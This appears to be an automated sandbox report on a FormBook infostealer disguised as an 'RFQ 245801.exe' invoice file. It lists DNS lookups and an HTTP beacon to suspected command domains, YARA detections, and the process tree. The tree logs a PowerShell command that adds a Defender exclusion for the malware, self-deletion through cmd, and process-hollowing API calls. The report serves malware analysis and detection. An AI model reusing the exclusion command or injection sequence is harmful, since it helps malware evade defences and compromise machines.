                                                                                                                                                                                Oct 7, 2024 14:49:05.127173901 CEST192.168.2.41.1.1.10x7febStandard query (0)www.earing-tests-69481.bondA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:49:25.478270054 CEST192.168.2.41.1.1.10xcb22Standard query (0)www.458881233.menA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:49:45.910301924 CEST192.168.2.41.1.1.10xcc2eStandard query (0)www.delark.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:50:06.300168991 CEST192.168.2.41.1.1.10x3fe2Standard query (0)www.ilw.legalA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:50:26.721621990 CEST192.168.2.41.1.1.10x8002Standard query (0)www.02s-pest-control-us-ze.funA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:50:47.188524008 CEST192.168.2.41.1.1.10xc480Standard query (0)www.sx9u.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:51:29.924470901 CEST192.168.2.41.1.1.10x8115Standard query (0)www.khizmetlergirisyapzzz2024.netA (IP address)IN (0x0001)false

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                Oct 7, 2024 14:47:43.390223026 CEST1.1.1.1192.168.2.40x5163No error (0)www.j88.travel188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:47:43.390223026 CEST1.1.1.1192.168.2.40x5163No error (0)www.j88.travel188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:48:03.874089003 CEST1.1.1.1192.168.2.40xc38dName error (3)www.venir-bienne.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:48:24.497123003 CEST1.1.1.1192.168.2.40x14bfName error (3)www.ridges-freezers-56090.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:48:44.817770004 CEST1.1.1.1192.168.2.40x984No error (0)www.oko.events185.26.122.70A (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:49:05.136404037 CEST1.1.1.1192.168.2.40x7febName error (3)www.earing-tests-69481.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:49:25.487400055 CEST1.1.1.1192.168.2.40xcb22Name error (3)www.458881233.mennonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:49:46.085643053 CEST1.1.1.1192.168.2.40xcc2eName error (3)www.delark.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:50:06.394150019 CEST1.1.1.1192.168.2.40x3fe2Name error (3)www.ilw.legalnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:50:26.733623981 CEST1.1.1.1192.168.2.40x8002Name error (3)www.02s-pest-control-us-ze.funnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:50:47.283157110 CEST1.1.1.1192.168.2.40xc480Name error (3)www.sx9u.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 7, 2024 14:51:29.935204029 CEST1.1.1.1192.168.2.40x8115Name error (3)www.khizmetlergirisyapzzz2024.netnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • www.j88.travel

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.449743188.114.96.3802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Oct 7, 2024 14:47:43.395895004 CEST170OUTGET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1
                                                                                                                                                                                Host: www.j88.travel
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                Oct 7, 2024 14:47:43.844379902 CEST937INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Date: Mon, 07 Oct 2024 12:47:43 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                Expires: Mon, 07 Oct 2024 13:47:43 GMT
                                                                                                                                                                                Location: https://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UWERR3Ig28l%2F23thf4RZCnhm%2BE5RJTlJ8RVzkLCtEf%2BoARmU%2F53RNek4p14UkxKOVq7vWrJyMoKsnlDXljM%2F6T%2BXS2ry3eM147S06kNF6OFgoMejNrVnvmkqLghviDl0lQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8cee005aab5b41e1-EWR
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:08:47:00
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\RFQ 245801.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\RFQ 245801.exe"
                                                                                                                                                                                Imagebase:0x620000
                                                                                                                                                                                File size:713'736 bytes
                                                                                                                                                                                MD5 hash:4BE29153BC863FA6D2914AAB9759E6AA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:2
                                                                                                                                                                                Start time:08:47:03
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
                                                                                                                                                                                Imagebase:0x260000
                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:3
                                                                                                                                                                                Start time:08:47:03
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\RFQ 245801.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\RFQ 245801.exe"
                                                                                                                                                                                Imagebase:0x50000
                                                                                                                                                                                File size:713'736 bytes
                                                                                                                                                                                MD5 hash:4BE29153BC863FA6D2914AAB9759E6AA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:4
                                                                                                                                                                                Start time:08:47:03
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:08:47:03
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Users\user\Desktop\RFQ 245801.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\RFQ 245801.exe"
                                                                                                                                                                                Imagebase:0xc30000
                                                                                                                                                                                File size:713'736 bytes
                                                                                                                                                                                MD5 hash:4BE29153BC863FA6D2914AAB9759E6AA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:08:47:04
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:7
                                                                                                                                                                                Start time:08:47:09
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                                                                                                                                                Imagebase:0x640000
                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:08:47:11
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:/c del "C:\Users\user\Desktop\RFQ 245801.exe"
                                                                                                                                                                                Imagebase:0x1d0000
                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:08:47:12
                                                                                                                                                                                Start date:07/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:7.9%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                  Total number of Nodes:204
                                                                                                                                                                                  Total number of Limit Nodes:18
                                                                                                                                                                                  execution_graph 22602 733a068 22603 733a1f3 22602->22603 22604 733a08e 22602->22604 22604->22603 22607 733a2e1 22604->22607 22610 733a2e8 PostMessageW 22604->22610 22608 733a2e8 PostMessageW 22607->22608 22609 733a354 22608->22609 22609->22604 22611 733a354 22610->22611 22611->22604 22612 73357af 22613 7335769 22612->22613 22614 733579c 22612->22614 22618 7338e20 22614->22618 22641 7338dd8 22614->22641 22663 7338dc9 22614->22663 22619 7338dff 22618->22619 22620 7338e2e 22618->22620 22639 7338e16 22619->22639 22686 73395d7 22619->22686 22693 73392d0 22619->22693 22701 7339591 22619->22701 22706 73399b3 22619->22706 22711 73396a8 22619->22711 22716 7339365 22619->22716 22721 7339b66 22619->22721 22726 7339347 22619->22726 22731 7339703 22619->22731 22739 7339323 22619->22739 22744 733947c 22619->22744 22749 73393dc 22619->22749 22754 73397dc 22619->22754 22759 733963d 22619->22759 22764 73399f9 22619->22764 22769 73393ba 22619->22769 22774 73393d4 22619->22774 22779 73393f5 22619->22779 22790 7339237 22619->22790 22620->22613 22639->22613 22642 7338df2 22641->22642 22643 7338e16 22642->22643 22644 73399b3 2 API calls 22642->22644 22645 7339591 2 API calls 22642->22645 22646 73392d0 4 API calls 22642->22646 22647 73395d7 4 API calls 22642->22647 22648 7339237 4 API calls 22642->22648 22649 73393f5 6 API calls 22642->22649 22650 73393d4 2 API calls 22642->22650 22651 73393ba 2 API calls 22642->22651 22652 73399f9 2 API calls 22642->22652 22653 733963d 2 API calls 22642->22653 22654 73397dc 2 API calls 22642->22654 22655 73393dc 2 API calls 22642->22655 22656 733947c 2 API calls 22642->22656 22657 7339323 2 API calls 22642->22657 22658 7339703 2 API calls 22642->22658 22659 7339347 2 API calls 22642->22659 22660 7339b66 2 API calls 22642->22660 22661 7339365 2 API calls 22642->22661 22662 73396a8 2 API calls 22642->22662 22643->22613 22644->22643 22645->22643 22646->22643 22647->22643 22648->22643 22649->22643 22650->22643 22651->22643 22652->22643 22653->22643 22654->22643 22655->22643 22656->22643 22657->22643 22658->22643 22659->22643 22660->22643 22661->22643 22662->22643 22664 7338da7 22663->22664 22665 7338dd6 22663->22665 22664->22613 22666 7338e16 22665->22666 22667 73399b3 2 API calls 22665->22667 22668 7339591 2 API calls 22665->22668 22669 73392d0 4 API calls 22665->22669 22670 73395d7 4 API calls 22665->22670 22671 7339237 4 API calls 22665->22671 22672 73393f5 6 API calls 22665->22672 22673 73393d4 2 API calls 22665->22673 22674 73393ba 2 API calls 22665->22674 22675 73399f9 2 API calls 22665->22675 22676 733963d 2 API calls 22665->22676 22677 73397dc 2 API calls 22665->22677 22678 73393dc 2 API calls 22665->22678 22679 733947c 2 API calls 22665->22679 22680 7339323 2 API calls 22665->22680 22681 7339703 2 API calls 22665->22681 22682 7339347 2 API calls 22665->22682 22683 7339b66 2 API calls 22665->22683 22684 7339365 2 API calls 22665->22684 22685 73396a8 2 API calls 22665->22685 22666->22613 22667->22666 22668->22666 22669->22666 22670->22666 22671->22666 22672->22666 22673->22666 22674->22666 22675->22666 22676->22666 22677->22666 22678->22666 22679->22666 22680->22666 22681->22666 22682->22666 22683->22666 22684->22666 22685->22666 22798 7334e10 22686->22798 22802 7334e08 22686->22802 22687 7339347 22806 7334921 22687->22806 22810 7334928 22687->22810 22688 733984a 22694 73392d6 22693->22694 22696 7339304 22694->22696 22814 7335230 22694->22814 22818 7335224 22694->22818 22695 7339ae4 22695->22639 22696->22639 22696->22695 22699 7334e10 Wow64SetThreadContext 22696->22699 22700 7334e08 Wow64SetThreadContext 22696->22700 22699->22696 22700->22696 22702 7339654 22701->22702 22702->22639 22703 7339c10 22702->22703 22822 7335091 22702->22822 22826 7335098 22702->22826 22703->22639 22708 733963d 22706->22708 22707 7339c10 22707->22639 22708->22639 22708->22707 22709 7335091 ReadProcessMemory 22708->22709 22710 7335098 ReadProcessMemory 22708->22710 22709->22708 22710->22708 22712 7339a1d 22711->22712 22830 7334fa0 22712->22830 22834 7334fa8 22712->22834 22713 7339916 22713->22639 22717 733932f 22716->22717 22717->22639 22718 7339ae4 22717->22718 22719 7334e10 Wow64SetThreadContext 22717->22719 22720 7334e08 Wow64SetThreadContext 22717->22720 22718->22639 22719->22717 22720->22717 22722 7339a1d 22721->22722 22724 7334fa0 WriteProcessMemory 22722->22724 22725 7334fa8 WriteProcessMemory 22722->22725 22723 7339916 22723->22639 22724->22723 22725->22723 22727 733934d 22726->22727 22729 7334921 ResumeThread 22727->22729 22730 7334928 ResumeThread 22727->22730 22728 733984a 22729->22728 22730->22728 22732 7339723 22731->22732 22737 7335091 ReadProcessMemory 22732->22737 22738 7335098 ReadProcessMemory 22732->22738 22733 73396d1 22733->22639 22734 7339c10 22733->22734 22735 7335091 ReadProcessMemory 22733->22735 22736 7335098 ReadProcessMemory 22733->22736 22734->22639 22735->22733 22736->22733 22737->22733 22738->22733 22740 733932f 22739->22740 22740->22639 22741 7339ae4 22740->22741 22742 7334e10 Wow64SetThreadContext 22740->22742 22743 7334e08 Wow64SetThreadContext 22740->22743 22741->22639 22742->22740 22743->22740 22747 7334fa0 WriteProcessMemory 22744->22747 22748 7334fa8 WriteProcessMemory 22744->22748 22745 7339452 22745->22744 22746 7339bf1 22745->22746 22746->22639 22747->22745 22748->22745 22751 733932f 22749->22751 22750 7339ae4 22750->22639 22751->22639 22751->22750 22752 7334e10 Wow64SetThreadContext 22751->22752 22753 7334e08 Wow64SetThreadContext 22751->22753 22752->22751 22753->22751 22755 733932f 22754->22755 22755->22639 22755->22754 22756 7339ae4 22755->22756 22757 7334e10 Wow64SetThreadContext 22755->22757 22758 7334e08 Wow64SetThreadContext 22755->22758 22756->22639 22757->22755 22758->22755 22761 7339643 22759->22761 22760 7339c10 22760->22639 22761->22639 22761->22760 22762 7335091 ReadProcessMemory 22761->22762 22763 7335098 ReadProcessMemory 22761->22763 22762->22761 22763->22761 22765 733932f 22764->22765 22765->22639 22766 7339ae4 22765->22766 22767 7334e10 Wow64SetThreadContext 22765->22767 22768 7334e08 Wow64SetThreadContext 22765->22768 22766->22639 22767->22765 22768->22765 22770 73393c7 22769->22770 22772 7334921 ResumeThread 22770->22772 22773 7334928 ResumeThread 22770->22773 22771 733984a 22772->22771 22773->22771 22775 733935e 22774->22775 22777 7334921 ResumeThread 22775->22777 22778 7334928 ResumeThread 22775->22778 22776 733984a 22777->22776 22778->22776 22838 7334ee0 22779->22838 22842 7334ee8 22779->22842 22780 73399ad 22781 7339413 22781->22780 22782 733932f 22781->22782 22784 7334fa0 WriteProcessMemory 22781->22784 22785 7334fa8 WriteProcessMemory 22781->22785 22782->22639 22783 7339ae4 22782->22783 22786 7334e10 Wow64SetThreadContext 22782->22786 22787 7334e08 Wow64SetThreadContext 22782->22787 22783->22639 22784->22781 22785->22781 22786->22782 22787->22782 22791 733923d 22790->22791 22796 7335230 CreateProcessA 22791->22796 22797 7335224 CreateProcessA 22791->22797 22792 7339ae4 22792->22639 22793 7339304 22793->22639 22793->22792 22794 7334e10 Wow64SetThreadContext 22793->22794 22795 7334e08 Wow64SetThreadContext 22793->22795 22794->22793 22795->22793 22796->22793 22797->22793 22799 7334e55 Wow64SetThreadContext 22798->22799 22801 7334e9d 22799->22801 22801->22687 22803 7334e10 Wow64SetThreadContext 22802->22803 22805 7334e9d 22803->22805 22805->22687 22807 7334928 ResumeThread 22806->22807 22809 7334999 22807->22809 22809->22688 22811 7334968 ResumeThread 22810->22811 22813 7334999 22811->22813 22813->22688 22815 73352b9 22814->22815 22815->22815 22816 733541e CreateProcessA 22815->22816 22817 733547b 22816->22817 22819 7335230 CreateProcessA 22818->22819 22821 733547b 22819->22821 22823 7335098 ReadProcessMemory 22822->22823 22825 7335127 22823->22825 22825->22702 22827 73350e3 ReadProcessMemory 22826->22827 22829 7335127 22827->22829 22829->22702 22831 7334fa8 WriteProcessMemory 22830->22831 22833 7335047 22831->22833 22833->22713 22835 7334ff0 WriteProcessMemory 22834->22835 22837 7335047 22835->22837 22837->22713 22839 7334ee8 VirtualAllocEx 22838->22839 22841 7334f65 22839->22841 22841->22781 22843 7334f28 VirtualAllocEx 22842->22843 22845 7334f65 22843->22845 22845->22781 22846 29eb3b0 22849 29eb498 22846->22849 22847 29eb3bf 22850 29eb4b9 22849->22850 22851 29eb4dc 22849->22851 22850->22851 22852 29eb6e0 GetModuleHandleW 22850->22852 22851->22847 22853 29eb70d 22852->22853 22853->22847

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 07330006 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: r
                                                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                                                  • Opcode ID: 9ffe0fe57471c33edb2feaccaf0e4ec3e971239e0c2f6222f430d6d55008e155
                                                                                                                                                                                  • Instruction ID: a7a068f3e86ff16fbffcb96b787c5d7e6971cf4be37d7c574dc4e1967bf302ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ffe0fe57471c33edb2feaccaf0e4ec3e971239e0c2f6222f430d6d55008e155
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB516CF4D19208CFDB18CFA9C4445EDBBBBBF4A311F1490A6E409AB212DB359985CF51
                                                                                                                                                                                  Function 0733AAF8 Relevance: .4, Instructions: 396COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1754007847.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7330000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3c48aae0319caed2001d100c41aec8efba4845c7e2f4add778f549f958715386
